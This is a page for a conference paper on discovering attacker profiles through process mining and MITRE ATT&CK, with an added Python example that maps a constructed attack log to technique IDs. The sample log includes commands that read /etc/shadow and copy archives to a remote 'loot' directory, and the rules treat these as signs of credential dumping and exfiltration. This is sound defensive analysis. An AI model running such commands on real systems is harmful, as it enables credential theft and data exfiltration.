Discovering attacker profiles using process mining and the MITRE ATT&CK taxonomy

Proceedings of the 12th Latin-American Symposium on Dependable and Secure Computing, LADC 2023 (2023)

Abstract
Understanding attackers' behavior is crucial to responding to cyberattacks effectively. Process Mining (PM) analyzes runtime event logs from information systems to discover the coordinated sequences of tasks carried out to achieve an objective. Our previous research explored using PM to profile attackers, specifically by analyzing event logs of low-level system processes to uncover the behavior of automated attackers. In this article, we propose a method that combines PM with the malicious-actor behavior taxonomies of the MITRE ATT&CK Framework to discover process models of observed attack strategies. These taxonomies raise the level of abstraction at which attackers are profiled, from individual system events to tactics and techniques. We demonstrate the method on a real dataset focused on human attacker behavior; the results provide guidelines for future work and support the development of more effective and adaptable security strategies against current cyber threats.
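The abstract describes two steps: lifting low-level events to ATT&CK technique labels, then discovering a process model from the resulting traces. The following Python is an added example written for this page, not code from the paper or its authors. It uses a constructed SSH/shell event log, an illustrative keyword-to-technique mapping (the technique IDs are real ATT&CK identifiers, but the rules are an assumption of this example and stand in for the analyst-curated mapping a real deployment would need), and a minimal directly-follows-graph discovery with frequency pruning, which is the simplest form of the process-discovery step the paper relies on. It also reports how many events the mapping could not explain, since an unmapped event silently dropped from a trace would distort the discovered model.

```python
from collections import Counter, defaultdict

# Constructed sample log for this example (not the paper's dataset):
# (session id, ISO-8601 timestamp, raw event text)
RAW_EVENTS = [
    ("s1", "2023-05-01T10:00:00", "sshd: Accepted password for admin from 10.0.0.5"),
    ("s1", "2023-05-01T10:00:05", "bash: whoami"),
    ("s1", "2023-05-01T10:00:09", "bash: ls -la /home"),
    ("s1", "2023-05-01T10:01:00", "bash: cat /etc/shadow"),
    ("s1", "2023-05-01T10:02:00", "bash: scp /tmp/dump.tgz 10.0.0.5:/loot"),
    ("s2", "2023-05-02T11:00:00", "sshd: Accepted password for root from 10.0.0.7"),
    ("s2", "2023-05-02T11:00:03", "bash: ls /var/www"),
    ("s2", "2023-05-02T11:00:08", "bash: clear"),            # no ATT&CK mapping
    ("s2", "2023-05-02T11:00:10", "bash: cat /etc/shadow"),
    ("s2", "2023-05-02T11:00:40", "bash: ssh web02"),
    ("s3", "2023-05-03T09:00:00", "sshd: Accepted password for deploy from 10.0.0.9"),
    ("s3", "2023-05-03T09:00:02", "bash: ls -la"),
    ("s3", "2023-05-03T09:00:30", "bash: cat /etc/shadow"),
    ("s3", "2023-05-03T09:01:00", "bash: scp /root/keys.tgz 10.0.0.9:/loot"),
]

# Assumed, illustrative mapping from event substrings to ATT&CK technique IDs.
# First matching rule wins, so order matters.
TECHNIQUE_RULES = [
    ("Accepted password", "T1078"),  # Valid Accounts
    ("whoami",            "T1033"),  # System Owner/User Discovery
    ("ls ",               "T1083"),  # File and Directory Discovery
    ("/etc/shadow",       "T1003"),  # OS Credential Dumping
    ("scp ",              "T1048"),  # Exfiltration Over Alternative Protocol
    ("ssh ",              "T1021"),  # Remote Services
]


def map_to_technique(message):
    """Return the first matching technique ID, or None if the event is unmapped."""
    for needle, technique in TECHNIQUE_RULES:
        if needle in message:
            return technique
    return None


def abstract_log(events):
    """Lift raw events to per-session traces of technique IDs (the abstraction step).
    Events are ordered by timestamp within a session. Unmapped events are dropped
    from the trace but counted, so the analyst can see how much of the log the
    taxonomy mapping fails to explain."""
    by_case, unmapped = defaultdict(list), 0
    for case_id, ts, msg in events:
        technique = map_to_technique(msg)
        if technique is None:
            unmapped += 1
            continue
        by_case[case_id].append((ts, technique))
    traces = {c: [t for _, t in sorted(evs)] for c, evs in by_case.items()}
    return traces, unmapped


def discover_dfg(traces):
    """Directly-follows graph: how often technique b immediately follows technique a,
    plus how often each technique starts or ends a session."""
    edges, starts, ends = Counter(), Counter(), Counter()
    for trace in traces.values():
        if not trace:
            continue
        starts[trace[0]] += 1
        ends[trace[-1]] += 1
        for a, b in zip(trace, trace[1:]):
            edges[(a, b)] += 1
    return edges, starts, ends


def prune(edges, min_freq):
    """Keep only transitions seen at least min_freq times (noise filtering)."""
    return {e: n for e, n in edges.items() if n >= min_freq}


def dominant_path(edges, starts):
    """Follow the heaviest outgoing edge from the most common start technique until
    no outgoing edge remains or a technique would repeat (loop guard). This is the
    single most typical attack strategy in the discovered model."""
    path = [starts.most_common(1)[0][0]]
    while True:
        out = [(n, b) for (a, b), n in edges.items() if a == path[-1] and b not in path]
        if not out:
            return path
        path.append(max(out)[1])


def to_dot(edges):
    """Render the (pruned) graph as Graphviz DOT for inspection."""
    lines = ["digraph attacker_profile {"]
    for (a, b), n in sorted(edges.items()):
        lines.append(f'  "{a}" -> "{b}" [label="{n}"];')
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    traces, unmapped = abstract_log(RAW_EVENTS)
    edges, starts, ends = discover_dfg(traces)
    print(f"{len(traces)} sessions, {unmapped} unmapped event(s)")
    print("dominant path:", " -> ".join(dominant_path(prune(edges, 2), starts)))
    print(to_dot(prune(edges, 2)))
```

On the constructed log the pruned model keeps three transitions (Valid Accounts to File and Directory Discovery, Discovery to OS Credential Dumping, Credential Dumping to Exfiltration) and the dominant path reads T1078 -> T1083 -> T1003 -> T1048, while the single `ssh web02` lateral-movement branch and the `whoami` step fall below the frequency threshold. With real data the mapping rules are the weak point: the unmapped count should be reviewed before trusting any discovered model, and a richer miner (for example the Heuristics or Inductive Miner in a PM toolkit) would replace the directly-follows graph.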
Keywords
Cybersecurity, process mining, attacker behavior, threat intelligence, MITRE ATT&CK Framework